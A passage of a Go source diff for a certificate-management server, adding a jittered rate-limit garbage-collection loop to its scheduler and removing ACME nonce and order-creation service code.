@@ -171,6 +188,7 @@ type Scheduler struct {
|
|||||||
jobTimeoutRunning atomic.Bool
|
jobTimeoutRunning atomic.Bool
|
||||||
acmeGCRunning atomic.Bool
|
acmeGCRunning atomic.Bool
|
||||||
sessionGCRunning atomic.Bool
|
sessionGCRunning atomic.Bool
|
||||||
|
rateLimitGCRunning atomic.Bool
|
||||||
|
|
||||||
// Graceful shutdown: wait for in-flight work to complete
|
// Graceful shutdown: wait for in-flight work to complete
|
||||||
wg sync.WaitGroup
|
wg sync.WaitGroup
|
||||||
@@ -209,6 +227,7 @@ func NewScheduler(
|
|||||||
jobTimeoutInterval: 10 * time.Minute,
|
jobTimeoutInterval: 10 * time.Minute,
|
||||||
acmeGCInterval: 1 * time.Minute,
|
acmeGCInterval: 1 * time.Minute,
|
||||||
sessionGCInterval: 1 * time.Hour,
|
sessionGCInterval: 1 * time.Hour,
|
||||||
|
rateLimitGCInterval: 5 * time.Minute,
|
||||||
// 5 minutes is 5×agentHealthCheckInterval default of 1m; an agent
|
// 5 minutes is 5×agentHealthCheckInterval default of 1m; an agent
|
||||||
// must miss multiple heartbeats before its in-flight jobs are reaped.
|
// must miss multiple heartbeats before its in-flight jobs are reaped.
|
||||||
agentOfflineJobTTL: 5 * time.Minute,
|
agentOfflineJobTTL: 5 * time.Minute,
|
||||||
@@ -365,6 +384,29 @@ func (s *Scheduler) SetSessionGCInterval(d time.Duration) {
|
|||||||
s.sessionGCInterval = d
|
s.sessionGCInterval = d
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SetRateLimitGarbageCollector wires the Phase 13 Sprint 13.3 rate-
|
||||||
|
// limit bucket GC. Optional; nil disables the loop (which is the
|
||||||
|
// correct behavior when CERTCTL_RATE_LIMIT_BACKEND=memory — the
|
||||||
|
// in-memory backend's prune-on-Allow path keeps buckets short-lived
|
||||||
|
// without a separate sweep).
|
||||||
|
//
|
||||||
|
// Concrete impl is *ratelimit.PostgresGC, constructed in
|
||||||
|
// cmd/server/main.go only when the postgres backend is selected.
|
||||||
|
func (s *Scheduler) SetRateLimitGarbageCollector(gc RateLimitGarbageCollector) {
|
||||||
|
s.rateLimitGC = gc
|
||||||
|
}
|
||||||
|
|
||||||
|
// SetRateLimitGCInterval configures the interval at which the rate-
|
||||||
|
// limit GC sweep runs. Default 5m. Wire:
|
||||||
|
// CERTCTL_RATE_LIMIT_JANITOR_INTERVAL. Zero or negative values are
|
||||||
|
// ignored.
|
||||||
|
func (s *Scheduler) SetRateLimitGCInterval(d time.Duration) {
|
||||||
|
if d <= 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
s.rateLimitGCInterval = d
|
||||||
|
}
|
||||||
|
|
||||||
// SetAgentOfflineJobTTL sets the threshold past which a Running job whose
|
// SetAgentOfflineJobTTL sets the threshold past which a Running job whose
|
||||||
// owning agent has gone silent is reaped to Failed. Bundle C / Audit M-016.
|
// owning agent has gone silent is reaped to Failed. Bundle C / Audit M-016.
|
||||||
// Zero or negative values are ignored (the default of 5 minutes is kept).
|
// Zero or negative values are ignored (the default of 5 minutes is kept).
|
||||||
@@ -426,6 +468,9 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
|||||||
if s.sessionGC != nil {
|
if s.sessionGC != nil {
|
||||||
loopCount++
|
loopCount++
|
||||||
}
|
}
|
||||||
|
if s.rateLimitGC != nil {
|
||||||
|
loopCount++
|
||||||
|
}
|
||||||
s.wg.Add(loopCount)
|
s.wg.Add(loopCount)
|
||||||
|
|
||||||
go func() { defer s.wg.Done(); s.renewalCheckLoop(ctx) }()
|
go func() { defer s.wg.Done(); s.renewalCheckLoop(ctx) }()
|
||||||
@@ -457,6 +502,9 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
|||||||
if s.sessionGC != nil {
|
if s.sessionGC != nil {
|
||||||
go func() { defer s.wg.Done(); s.sessionGCLoop(ctx) }()
|
go func() { defer s.wg.Done(); s.sessionGCLoop(ctx) }()
|
||||||
}
|
}
|
||||||
|
if s.rateLimitGC != nil {
|
||||||
|
go func() { defer s.wg.Done(); s.rateLimitGCLoop(ctx) }()
|
||||||
|
}
|
||||||
|
|
||||||
// Signal that all loops are launched
|
// Signal that all loops are launched
|
||||||
close(startedChan)
|
close(startedChan)
|
||||||
@@ -473,7 +521,7 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) renewalCheckLoop(ctx context.Context) {
|
func (s *Scheduler) renewalCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.renewalCheckInterval)
|
ticker := NewJitteredTicker(s.renewalCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -522,7 +570,7 @@ func (s *Scheduler) runRenewalCheck(ctx context.Context) {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous job is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous job is still running.
|
||||||
func (s *Scheduler) jobProcessorLoop(ctx context.Context) {
|
func (s *Scheduler) jobProcessorLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.jobProcessorInterval)
|
ticker := NewJitteredTicker(s.jobProcessorInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -573,7 +621,7 @@ func (s *Scheduler) runJobProcessor(ctx context.Context) {
|
|||||||
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
||||||
// is still running.
|
// is still running.
|
||||||
func (s *Scheduler) jobRetryLoop(ctx context.Context) {
|
func (s *Scheduler) jobRetryLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.jobRetryInterval)
|
ticker := NewJitteredTicker(s.jobRetryInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -628,7 +676,7 @@ func (s *Scheduler) runJobRetry(ctx context.Context) {
|
|||||||
// retry loop then auto-promotes eligible Failed jobs back to Pending. Closes
|
// retry loop then auto-promotes eligible Failed jobs back to Pending. Closes
|
||||||
// coverage gap I-003. Uses atomic.Bool to prevent duplicate execution.
|
// coverage gap I-003. Uses atomic.Bool to prevent duplicate execution.
|
||||||
func (s *Scheduler) jobTimeoutLoop(ctx context.Context) {
|
func (s *Scheduler) jobTimeoutLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.jobTimeoutInterval)
|
ticker := NewJitteredTicker(s.jobTimeoutInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -706,7 +754,7 @@ func (s *Scheduler) runJobTimeout(ctx context.Context) {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) {
|
func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.agentHealthCheckInterval)
|
ticker := NewJitteredTicker(s.agentHealthCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -754,7 +802,7 @@ func (s *Scheduler) runAgentHealthCheck(ctx context.Context) {
|
|||||||
// If an error occurs, it logs the error but continues running.
|
// If an error occurs, it logs the error but continues running.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous process is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous process is still running.
|
||||||
func (s *Scheduler) notificationProcessLoop(ctx context.Context) {
|
func (s *Scheduler) notificationProcessLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.notificationProcessInterval)
|
ticker := NewJitteredTicker(s.notificationProcessInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -806,7 +854,7 @@ func (s *Scheduler) runNotificationProcess(ctx context.Context) {
|
|||||||
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
// Uses atomic.Bool to prevent duplicate execution if the previous retry sweep
|
||||||
// is still running. Mirrors the I-001 jobRetryLoop topology byte-for-byte.
|
// is still running. Mirrors the I-001 jobRetryLoop topology byte-for-byte.
|
||||||
func (s *Scheduler) notificationRetryLoop(ctx context.Context) {
|
func (s *Scheduler) notificationRetryLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.notificationRetryInterval)
|
ticker := NewJitteredTicker(s.notificationRetryInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -861,7 +909,7 @@ func (s *Scheduler) runNotificationRetry(ctx context.Context) {
|
|||||||
// no CRL/OCSP needed.
|
// no CRL/OCSP needed.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
|
func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.shortLivedExpiryCheckInterval)
|
ticker := NewJitteredTicker(s.shortLivedExpiryCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -909,7 +957,7 @@ func (s *Scheduler) runShortLivedExpiryCheck(ctx context.Context) {
|
|||||||
// of configured network targets.
|
// of configured network targets.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
||||||
func (s *Scheduler) networkScanLoop(ctx context.Context) {
|
func (s *Scheduler) networkScanLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.networkScanInterval)
|
ticker := NewJitteredTicker(s.networkScanInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -956,7 +1004,7 @@ func (s *Scheduler) runNetworkScan(ctx context.Context) {
|
|||||||
// digestLoop runs every digestInterval and generates/sends certificate digest emails.
|
// digestLoop runs every digestInterval and generates/sends certificate digest emails.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous digest is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous digest is still running.
|
||||||
func (s *Scheduler) digestLoop(ctx context.Context) {
|
func (s *Scheduler) digestLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.digestInterval)
|
ticker := NewJitteredTicker(s.digestInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Do NOT run immediately on start for digest — wait for the first tick.
|
// Do NOT run immediately on start for digest — wait for the first tick.
|
||||||
@@ -999,7 +1047,7 @@ func (s *Scheduler) runDigest(ctx context.Context) {
|
|||||||
// resource-intensive. Wait for the first tick.
|
// resource-intensive. Wait for the first tick.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||||
func (s *Scheduler) healthCheckLoop(ctx context.Context) {
|
func (s *Scheduler) healthCheckLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.healthCheckInterval)
|
ticker := NewJitteredTicker(s.healthCheckInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Do NOT run immediately on start for health checks — wait for the first tick.
|
// Do NOT run immediately on start for health checks — wait for the first tick.
|
||||||
@@ -1041,7 +1089,7 @@ func (s *Scheduler) runHealthCheck(ctx context.Context) {
|
|||||||
// Runs immediately on start, then on each tick. Same idempotency pattern as networkScanLoop.
|
// Runs immediately on start, then on each tick. Same idempotency pattern as networkScanLoop.
|
||||||
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running.
|
||||||
func (s *Scheduler) cloudDiscoveryLoop(ctx context.Context) {
|
func (s *Scheduler) cloudDiscoveryLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.cloudDiscoveryInterval)
|
ticker := NewJitteredTicker(s.cloudDiscoveryInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Run immediately on start (with idempotency guard)
|
// Run immediately on start (with idempotency guard)
|
||||||
@@ -1121,7 +1169,7 @@ func (s *Scheduler) WaitForCompletion(timeout time.Duration) error {
|
|||||||
//
|
//
|
||||||
// Bundle CRL/OCSP-Responder Phase 3.
|
// Bundle CRL/OCSP-Responder Phase 3.
|
||||||
func (s *Scheduler) crlGenerationLoop(ctx context.Context) {
|
func (s *Scheduler) crlGenerationLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.crlGenerationInterval)
|
ticker := NewJitteredTicker(s.crlGenerationInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
// Do NOT run immediately on start. CRLs are typically valid for
|
// Do NOT run immediately on start. CRLs are typically valid for
|
||||||
@@ -1171,7 +1219,7 @@ var ErrSchedulerShutdownTimeout = errors.New("scheduler graceful shutdown timeou
|
|||||||
// sync.WaitGroup tracks the in-flight goroutine for graceful shutdown.
|
// sync.WaitGroup tracks the in-flight goroutine for graceful shutdown.
|
||||||
// Phase 5.
|
// Phase 5.
|
||||||
func (s *Scheduler) acmeGCLoop(ctx context.Context) {
|
func (s *Scheduler) acmeGCLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.acmeGCInterval)
|
ticker := NewJitteredTicker(s.acmeGCInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
for {
|
for {
|
||||||
@@ -1212,7 +1260,7 @@ func (s *Scheduler) acmeGCLoop(ctx context.Context) {
|
|||||||
// file: a stuck Postgres can't block the next tick, and concurrent
|
// file: a stuck Postgres can't block the next tick, and concurrent
|
||||||
// sweeps are skipped not queued.
|
// sweeps are skipped not queued.
|
||||||
func (s *Scheduler) sessionGCLoop(ctx context.Context) {
|
func (s *Scheduler) sessionGCLoop(ctx context.Context) {
|
||||||
ticker := time.NewTicker(s.sessionGCInterval)
|
ticker := NewJitteredTicker(s.sessionGCInterval, DefaultSchedulerJitter)
|
||||||
defer ticker.Stop()
|
defer ticker.Stop()
|
||||||
|
|
||||||
for {
|
for {
|
||||||
@@ -1247,3 +1295,45 @@ func (s *Scheduler) sessionGCLoop(ctx context.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// rateLimitGCLoop runs every rateLimitGCInterval and invokes
|
||||||
|
// RateLimitGarbageCollector.GarbageCollect, which sweeps stale rows
|
||||||
|
// from the rate_limit_buckets table introduced in Phase 13 Sprint
|
||||||
|
// 13.2's migration 000046.
|
||||||
|
//
|
||||||
|
// Wired only when CERTCTL_RATE_LIMIT_BACKEND=postgres (the in-memory
|
||||||
|
// backend's prune-on-Allow path keeps buckets short-lived without a
|
||||||
|
// separate sweep — cmd/server/main.go skips SetRateLimitGarbageCollector
|
||||||
|
// for that case so this loop never launches).
|
||||||
|
//
|
||||||
|
// Phase 13 Sprint 13.3 closure. The atomic.Bool guard + per-tick
|
||||||
|
// context.WithTimeout match every other GC loop's pattern.
|
||||||
|
func (s *Scheduler) rateLimitGCLoop(ctx context.Context) {
|
||||||
|
ticker := NewJitteredTicker(s.rateLimitGCInterval, DefaultSchedulerJitter)
|
||||||
|
defer ticker.Stop()
|
||||||
|
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
return
|
||||||
|
case <-ticker.C:
|
||||||
|
if !s.rateLimitGCRunning.CompareAndSwap(false, true) {
|
||||||
|
s.logger.Warn("rate-limit GC sweep still running, skipping tick")
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
s.wg.Add(1)
|
||||||
|
go func() {
|
||||||
|
defer s.wg.Done()
|
||||||
|
defer s.rateLimitGCRunning.Store(false)
|
||||||
|
// 1-minute timeout matches acme + session GC loops.
|
||||||
|
opCtx, cancel := context.WithTimeout(ctx, time.Minute)
|
||||||
|
defer cancel()
|
||||||
|
if n, err := s.rateLimitGC.GarbageCollect(opCtx); err != nil {
|
||||||
|
s.logger.Warn("rate-limit gc sweep failed (next tick will retry)", "error", err)
|
||||||
|
} else if n > 0 {
|
||||||
|
s.logger.Debug("rate-limit gc swept stale buckets", "rows", n)
|
||||||
|
}
|
||||||
|
}()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
+6
-809
@@ -5,7 +5,6 @@ package service
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
cryptorand "crypto/rand"
|
|
||||||
"crypto/x509"
|
"crypto/x509"
|
||||||
"errors"
|
"errors"
|
||||||
"fmt"
|
"fmt"
|
||||||
@@ -420,28 +419,6 @@ func (s *ACMEService) BuildDirectory(ctx context.Context, profileID, baseURL str
|
|||||||
return dir, nil
|
return dir, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// IssueNonce generates a fresh ACME nonce, persists it with the
|
|
||||||
// configured TTL, and returns the encoded string for the
|
|
||||||
// Replay-Nonce header.
|
|
||||||
//
|
|
||||||
// RFC 8555 §6.5: every successful ACME response carries a
|
|
||||||
// Replay-Nonce. Phase 1a wires this via the directory + new-nonce
|
|
||||||
// handlers; Phase 1b extends with new-account + account/<id> POST
|
|
||||||
// responses (the JWS-authenticated paths).
|
|
||||||
func (s *ACMEService) IssueNonce(ctx context.Context) (string, error) {
|
|
||||||
nonce, err := acme.GenerateNonce()
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: generate nonce: %w", err)
|
|
||||||
}
|
|
||||||
if err := s.repo.IssueNonce(ctx, nonce, s.cfg.NonceTTL); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: persist nonce: %w", err)
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.NewNonceTotal)
|
|
||||||
return nonce, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// resolveProfile applies the default-profile fallback and confirms the
|
// resolveProfile applies the default-profile fallback and confirms the
|
||||||
// profile exists. Returns the resolved (canonical) profileID on
|
// profile exists. Returns the resolved (canonical) profileID on
|
||||||
// success. Centralizing the resolution here keeps every Phase
|
// success. Centralizing the resolution here keeps every Phase
|
||||||
@@ -814,457 +791,13 @@ func (s *ACMEService) DeactivateAccount(ctx context.Context, accountID string) (
|
|||||||
return acct, nil
|
return acct, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// --- Phase 2 — orders + authz + finalize + cert download ---------------
|
|
||||||
|
|
||||||
// CreateOrder validates a new-order request against the bound profile
|
|
||||||
// and persists the order + per-identifier authz + per-authz challenge
|
|
||||||
// rows in one WithinTx. Returns the created order on success.
|
|
||||||
//
|
|
||||||
// Auth-mode dispatch:
|
|
||||||
// - trust_authenticated (default): order goes immediately to status=ready,
|
|
||||||
// each authz immediately to status=valid (no challenge validation
|
|
||||||
// required); a single placeholder http-01 challenge per authz is
|
|
||||||
// persisted with status=valid for RFC 8555 compliance (the spec
|
|
||||||
// requires challenges on every authz).
|
|
||||||
// - challenge: order stays at status=pending, authzs at status=pending,
|
|
||||||
// challenges at status=pending, until Phase 3's validators run.
|
|
||||||
func (s *ACMEService) CreateOrder(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID, profileID string,
|
|
||||||
identifiers []domain.ACMEIdentifier,
|
|
||||||
notBefore, notAfter *time.Time,
|
|
||||||
) (*domain.ACMEOrder, error) {
|
|
||||||
if s.tx == nil || s.auditService == nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: new-order requires SetTransactor + SetAuditService")
|
|
||||||
}
|
|
||||||
// Phase 5 — per-account orders/hour cap. Hits return rateLimited
|
|
||||||
// (RFC 8555 §6.7) before any DB work. Counter is in-memory; restart
|
|
||||||
// wipes (eventual-consistency caps are acceptable).
|
|
||||||
if s.rateLimiter != nil && s.cfg.RateLimitOrdersPerHour > 0 {
|
|
||||||
if !s.rateLimiter.Allow(acme.ActionNewOrder, accountID, s.cfg.RateLimitOrdersPerHour) {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, ErrACMERateLimited
|
|
||||||
}
|
|
||||||
}
|
|
||||||
// Phase 5 — concurrent-orders cap. We count
|
|
||||||
// pending/ready/processing orders for this account; if at-or-over
|
|
||||||
// the cap, reject. This is a DB read (no FOR UPDATE), so two
|
|
||||||
// requests racing under the threshold can both succeed and push
|
|
||||||
// the account one over — accepted as eventual-consistency.
|
|
||||||
if s.cfg.RateLimitConcurrentOrders > 0 {
|
|
||||||
count, cerr := s.repo.CountActiveOrdersByAccount(ctx, accountID)
|
|
||||||
if cerr == nil && count >= s.cfg.RateLimitConcurrentOrders {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, ErrACMEConcurrentOrdersExceeded
|
|
||||||
}
|
|
||||||
}
|
|
||||||
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
|
||||||
}
|
|
||||||
authMode := profile.ACMEAuthMode
|
|
||||||
if authMode == "" {
|
|
||||||
authMode = string(s.cfg.DefaultAuthMode)
|
|
||||||
}
|
|
||||||
if authMode == "" {
|
|
||||||
authMode = "trust_authenticated"
|
|
||||||
}
|
|
||||||
if authMode != "trust_authenticated" && authMode != "challenge" {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("%w: %q", ErrACMEUnsupportedAuthMode, authMode)
|
|
||||||
}
|
|
||||||
|
|
||||||
now := time.Now().UTC()
|
|
||||||
orderTTL := s.cfg.OrderTTL
|
|
||||||
if orderTTL <= 0 {
|
|
||||||
orderTTL = 24 * time.Hour
|
|
||||||
}
|
|
||||||
authzTTL := s.cfg.AuthzTTL
|
|
||||||
if authzTTL <= 0 {
|
|
||||||
authzTTL = 24 * time.Hour
|
|
||||||
}
|
|
||||||
|
|
||||||
// In trust_authenticated mode, the order goes straight to `ready`
|
|
||||||
// (RFC 8555 §7.1.6: ready means all authzs valid, awaiting CSR).
|
|
||||||
// In challenge mode, the order stays `pending` until challenges
|
|
||||||
// validate.
|
|
||||||
orderStatus := domain.ACMEOrderStatusPending
|
|
||||||
authzStatus := domain.ACMEAuthzStatusPending
|
|
||||||
challengeStatus := domain.ACMEChallengeStatusPending
|
|
||||||
if authMode == "trust_authenticated" {
|
|
||||||
orderStatus = domain.ACMEOrderStatusReady
|
|
||||||
authzStatus = domain.ACMEAuthzStatusValid
|
|
||||||
challengeStatus = domain.ACMEChallengeStatusValid
|
|
||||||
}
|
|
||||||
|
|
||||||
order := &domain.ACMEOrder{
|
|
||||||
OrderID: "acme-ord-" + randIDSuffix(),
|
|
||||||
AccountID: accountID,
|
|
||||||
Identifiers: identifiers,
|
|
||||||
Status: orderStatus,
|
|
||||||
ExpiresAt: now.Add(orderTTL),
|
|
||||||
NotBefore: notBefore,
|
|
||||||
NotAfter: notAfter,
|
|
||||||
CreatedAt: now,
|
|
||||||
UpdatedAt: now,
|
|
||||||
}
|
|
||||||
|
|
||||||
auditDetails := map[string]interface{}{
|
|
||||||
"account_id": accountID,
|
|
||||||
"profile_id": resolvedProfileID,
|
|
||||||
"auth_mode": authMode,
|
|
||||||
"identifier_n": len(identifiers),
|
|
||||||
"identifiers": identifierStrings(identifiers),
|
|
||||||
}
|
|
||||||
|
|
||||||
err = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.CreateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return fmt.Errorf("acme: create order: %w", err)
|
|
||||||
}
|
|
||||||
// Per-identifier authz + 1 placeholder challenge per authz.
|
|
||||||
for _, id := range identifiers {
|
|
||||||
authz := &domain.ACMEAuthorization{
|
|
||||||
AuthzID: "acme-authz-" + randIDSuffix(),
|
|
||||||
OrderID: order.OrderID,
|
|
||||||
Identifier: id,
|
|
||||||
Status: authzStatus,
|
|
||||||
ExpiresAt: now.Add(authzTTL),
|
|
||||||
Wildcard: strings.HasPrefix(id.Value, "*."),
|
|
||||||
CreatedAt: now,
|
|
||||||
UpdatedAt: now,
|
|
||||||
}
|
|
||||||
if err := s.repo.CreateAuthzWithTx(ctx, q, authz); err != nil {
|
|
||||||
return fmt.Errorf("acme: create authz: %w", err)
|
|
||||||
}
|
|
||||||
// RFC 8555 §8: every authz needs at least one challenge
|
|
||||||
// row. Phase 2 emits a single http-01 placeholder; Phase 3
|
|
||||||
// will fan out to all 3 challenge types under challenge mode.
|
|
||||||
ch := &domain.ACMEChallenge{
|
|
||||||
ChallengeID: "acme-chall-" + randIDSuffix(),
|
|
||||||
AuthzID: authz.AuthzID,
|
|
||||||
Type: domain.ACMEChallengeTypeHTTP01,
|
|
||||||
Status: challengeStatus,
|
|
||||||
Token: randIDSuffix(),
|
|
||||||
CreatedAt: now,
|
|
||||||
}
|
|
||||||
if challengeStatus == domain.ACMEChallengeStatusValid {
|
|
||||||
validatedAt := now
|
|
||||||
ch.ValidatedAt = &validatedAt
|
|
||||||
}
|
|
||||||
if err := s.repo.CreateChallengeWithTx(ctx, q, ch); err != nil {
|
|
||||||
return fmt.Errorf("acme: create challenge: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(
|
|
||||||
ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID),
|
|
||||||
domain.ActorTypeUser,
|
|
||||||
"acme_order_created",
|
|
||||||
"acme_order",
|
|
||||||
order.OrderID,
|
|
||||||
auditDetails,
|
|
||||||
)
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.NewOrderTotal)
|
|
||||||
return order, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// LookupOrder returns an order by ID, asserting the requesting
|
|
||||||
// account owns it. ErrACMEOrderUnauthorized when account_id mismatches.
|
|
||||||
func (s *ACMEService) LookupOrder(ctx context.Context, orderID, accountID string) (*domain.ACMEOrder, error) {
|
|
||||||
order, err := s.repo.GetOrderByID(ctx, orderID)
|
|
||||||
if err != nil {
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
return nil, ErrACMEOrderNotFound
|
|
||||||
}
|
|
||||||
return nil, fmt.Errorf("acme: lookup order: %w", err)
|
|
||||||
}
|
|
||||||
if order.AccountID != accountID {
|
|
||||||
return nil, ErrACMEOrderUnauthorized
|
|
||||||
}
|
|
||||||
return order, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// LookupAuthz returns an authz by ID. Authz rows aren't account-scoped
|
|
||||||
// directly; the handler asserts via the parent order if needed.
|
|
||||||
func (s *ACMEService) LookupAuthz(ctx context.Context, authzID string) (*domain.ACMEAuthorization, error) {
|
|
||||||
authz, err := s.repo.GetAuthzByID(ctx, authzID)
|
|
||||||
if err != nil {
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
return nil, ErrACMEAuthzNotFound
|
|
||||||
}
|
|
||||||
return nil, fmt.Errorf("acme: lookup authz: %w", err)
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.AuthzReadTotal)
|
|
||||||
return authz, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// ListAuthzsByOrder returns the per-order authz rows. Used by
|
|
||||||
// MarshalOrder to compute the authorizations URL list.
|
|
||||||
